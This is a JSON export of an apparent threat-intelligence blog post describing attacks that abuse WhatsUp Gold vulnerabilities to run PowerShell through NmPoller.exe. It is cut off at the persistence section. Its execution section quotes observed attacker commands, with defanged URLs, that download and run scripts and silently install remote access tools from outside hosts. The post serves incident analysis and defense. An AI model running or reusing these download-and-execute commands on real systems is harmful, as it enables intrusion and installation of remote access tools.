{"id":57084,"date":"2024-09-12T00:00:00","date_gmt":"2024-09-12T00:00:00","guid":{"rendered":"urn:uuid:aac20ec2-ae7d-8418-ecf0-ef3ef68e2b21"},"modified":"2024-09-12T00:00:00","modified_gmt":"2024-09-12T00:00:00","slug":"protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/","title":{"rendered":"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities"},"content":{"rendered":"

<\/p>\n

<\/div>\n
\n
\n

How attacks were observed in Trend Vision One<\/h4>\n

Initial access<\/b><\/h5>\n

Activity monitoring on Trend Vision One showed that a suspicious script retrieved from a suspicious URL was suddenly executed on the computer hosting WhatsUp Gold. The timeline prior to the incident showed no suspicious logon events, suspicious URLs accessed by users, or malware execution. These are typical events in the early stages of incidents, but if these have not appeared, it’s more likely that a vulnerability has been involved.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n

\n
\n

The polling process NmPoller.exe<\/i>, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function (Figure 2). The threat actors in this case chose it to perform for remote arbitrary code execution.<\/p>\n

The malicious code that was executed by NmPoller.exe<\/i> looks like this: The first part of the square is the prefix, and the last two lines are the malicious code submitted by the threat actor. Several variations of this part have been observed, as shown in Figure 3.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n

\n
\n
Execution<\/b><\/h5>\n

Multiple PowerShell scripts were executed via NmPoller.exe<\/i>. <\/b>The following scripts were executed as the malicious part multiple times combined with the prefix part described in the previous section:<\/p>\n

(New-Object System.Net.WebClient).DownloadFile(‘hxxps:\/\/webhook[.]site\/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837′,’c:\\\\programdata\\\\a.ps1’); powershell -exec bypass -file c:\\\\programdata\\\\a.ps1<\/p><\/blockquote>\n

msiexec \/i hxxp:\/\/45.227.255[.]216:29742\/ddQCz2CkW8\/setup.msi \/Qn<\/p><\/blockquote>\n

msiexec \/i hxxps:\/\/fedko[.]org\/wp-includes\/ID3\/setup.msi \/Qn<\/p><\/blockquote>\n

iwr -uri hxxps:\/\/fedko[.]org\/wp-includes\/ID3\/setup.msi -outfile c:\\\\windows\\\\temp\\\\MSsetup.msi ; msiexec \/i c:\\\\windows\\\\temp\\\\MSsetup.msi \/Qn<\/p><\/blockquote>\n

The file a.ps1 contained only one line:<\/p>\n

[“(New-Object System.Net.WebClient).DownloadFile(‘hxxp:\/\/185.123.100[.]160\/access\/Remote Access-windows64-offline.exe?language=en&app=61021689825303726412222891579678345108&hostname=hxxp:\/\/185.123.100[.]160′,’C:\\\\programdata\\\\ftpd32.exe’);start-process C:\\\\programdata\\\\ftpd32.exe;”]<\/p><\/blockquote><\/div>\n<\/p><\/div>\n

\n
\n
Persistence<\/b><\/h5>\n

In this case, the threat actor aimed to install remote administration tools through PowerShell. They attempted to install these four remote access tools (RATs) via msiexec.exe<\/i> (Figure 4):<\/p>\n